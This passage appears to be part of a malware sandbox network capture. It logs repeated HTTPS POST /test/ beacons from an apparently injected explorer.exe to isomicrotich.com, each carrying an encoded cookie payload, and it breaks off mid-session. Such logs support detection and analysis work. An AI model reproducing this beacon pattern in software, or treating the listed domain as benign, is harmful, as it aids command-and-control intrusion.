49  192.168.2.7  62346  188.114.97.3  443  4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:27 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFl6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:27 UTC  571  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:27 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QtUidlJuebNu5hzZXUk77lchvhiDL%2BoB7%2FcUquOcA1bFm0cZiXmjvy%2BsaifzWCY%2FyXY2Bf1ZNtHHVLlayK2zbwZAJqA%2FBcjpb4eR7jkNMmyB28Lci%2BeKSDnsBuotmPfHIe9m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19cc1bf743b8-EWR
2024-10-03 18:47:27 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
50  192.168.2.7  62347  188.114.97.3  443  4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:28 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:28 UTC  565  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQCps9bAsewgiCtwJVMZlZb6RO0qDHhdGgocZ%2F3ZRrm1rId9Q%2B4bDxI91Vf9c4kFYiRYjYRkKmkaruc6eOapduxNqkcp8GU%2BGNiMT6728PBx4H3Eb6p4VNe3eIt5W6OnIACq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19d3ae0e8c48-EWR
2024-10-03 18:47:28 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
51  192.168.2.7  62348  188.114.97.3  443  4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:29 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:30 UTC  576  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0scJRJRlbMbbGIuH9XEJA2%2BxwVbwOz9HDqhdK%2BUy3ufmulB2ByI5Y0HxRAiv4%2FxIsDi2cbTwgoNHXNfUgd236BHOA%2FGb4XIZSTgk7zN9QGXV3E%2FhFywca0Dgctnhz3T7uMS2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19da593a2395-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-10-03 18:47:30 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
52  192.168.2.7  62351  188.114.97.3  443  4056  C:\Windows\explorer.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:31 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:31 UTC  544  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjuiLNPLZ8xI6Lh95wSr9sCxSDSWJC9s6gi0Ba06Qs7e8CoX%2F%2FhEirILxWqWVAtZi1YLhDhZhDlu7LBpz5QicyD7B7KOWO1bPc9JH9yGi2O7v3m6cs2ZovcAeZ4SAzkQ%2BWfW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19e41d5972ad-EWR
2024-10-03 18:47:31 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
53  192.168.2.7  62353  188.114.97.3  443
Timestamp  Bytes transferred  Direction  Data
2024-10-03 18:47:32 UTC  421  OUT  POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:32 UTC    554    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNMf7NEjxqOX8x1zlEQIYEu3yOejptKtIN93wCYXXTVfbH4Op%2BIhu14z%2Bt4LP%2FXMmUQ2s5hm%2FoK008MyP3R1Q6Vmbzg8BuL0C%2BzxlJ%2B479m%2BPHd1PC%2BpyecY4Blh%2B5LgPQ2a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19ea7a3180d9-EWR
2024-10-03 18:47:32 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
54            192.168.2.7    62354          188.114.97.3      443
Timestamp    Bytes transferred    Direction    Data
2024-10-03 18:47:33 UTC    421    OUT    POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:33 UTC    571    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HxzAvVvms5Z876I8sXl1vWx6tPmliJLA%2FvvX2oYPiAENw3qxx%2FMCtj%2B%2BNrquSLw1lSadpxXl2DE5Tw1xErgM7bKc8LAcf4fZuOR2Wt%2BWtr4HgbkOTXO6s3%2BxyX99SiDSodOY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19f17d074283-EWR
2024-10-03 18:47:33 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
55            192.168.2.7    62356          188.114.97.3      443
Timestamp    Bytes transferred    Direction    Data
2024-10-03 18:47:34 UTC    421    OUT    POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:34 UTC    603    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BHQ2ssbqkNV3MOUnoyZKn8Y%2FMpMjVq5Am0s7%2BFHy8bXLQhLIRLcRZpNOLaXK6D8%2B1f1rAhlF6QTDm%2FGrkX68AVxLvZgWHZnPKQQ%2FyJKBzo2aO%2BBvKRSds2znIyX%2FN6TjubT7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19f7cb2b425c-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-10-03 18:47:34 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
56            192.168.2.7    62357          188.114.97.3      443
Timestamp    Bytes transferred    Direction    Data
2024-10-03 18:47:35 UTC    421    OUT    POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:35 UTC    573    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F26JTu9l4Nyz%2FoEROX9KyUAmHvgtQQzVbxUxGom4WMaZqrHrXf9QtXPrXntyee2z8jU0w7C50LVsALvncgUe%2B5F9c3qrd%2F6yyR3OH%2BOiaUs%2FssKDQ%2B1HXKpXEzhJ2TZbRaAp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19fe3cce5e60-EWR
2024-10-03 18:47:35 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
57            192.168.2.7    62358          188.114.97.3      443
Timestamp    Bytes transferred    Direction    Data
2024-10-03 18:47:36 UTC    421    OUT    POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:37 UTC    540    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PbTIWpKHIxJBSDX3nphYwLE8rXYr2n28KrNm21x100XpSTe%2B1fGid%2B53gTscab4kco03CMroJ9Erdcry0hWO9nhPCkYFzmHYRrBpB5diCACsBhCNrXdFoo8FwcGPFvQCCXwt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a072cac0cae-EWR
2024-10-03 18:47:37 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
58            192.168.2.7    62359          188.114.97.3      443
Timestamp    Bytes transferred    Direction    Data
2024-10-03 18:47:37 UTC    421    OUT    POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:38 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4ZefGtntVMLAekTy1LO1VNhMPG93D5HZkHWQ7M6jVT6Ie84xy5HS4qtpiZR0MF16kSTRslJpBJ7%2Ba2te0IDQB%2BG3WnUDsLRgHd%2FXgtPoBo1b4hauG5WQ%2FNM307%2BA3J4cxqN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a0dca446a59-EWR
2024-10-03 18:47:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.7 | 62362 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:39 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:39 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uoP%2FQvBc7N0cBPILJrf9sfYkdpDDNAYdTeSP5TylbRAAc8X4rRn%2FeJouzrZHFYNC2Q3pt8ZfZ2zVQH02zaFk05i8qp5EpwAyQ8716DI6dnFf5jskT%2FJbLAu2l5QKVPZIA2ZP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a162a4e427c-EWR
2024-10-03 18:47:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.7 | 62364 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:40 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:40 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZfAGYvokzHPB1%2FP3j1sXuloFyUTm0f6f43i4a6CZB79hCg0ZAfiobraVLxl2xHtsDnlIkrwg%2BytXC5rhM18AQnpGm95QkBWAtdqOuR6UvKMoxxjLDiR5ktW%2BqSPsPTL8ryQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a1c5d5dde98-EWR
2024-10-03 18:47:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.7 | 62365 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:41 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:42 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKC6eYVO2mA1jvMinx%2FGv6xXbwBSQlCA8xUyD7I617icUTv3c4I1YQpaS4G%2BDoilkPjPrAqpip5ib4XbGFVickwT153rrItBoxcF1m%2FaduBsz2amCnvBXTjlViVTeRzJj32G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a26aa9b43b2-EWR
2024-10-03 18:47:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.7 | 62366 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:42 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
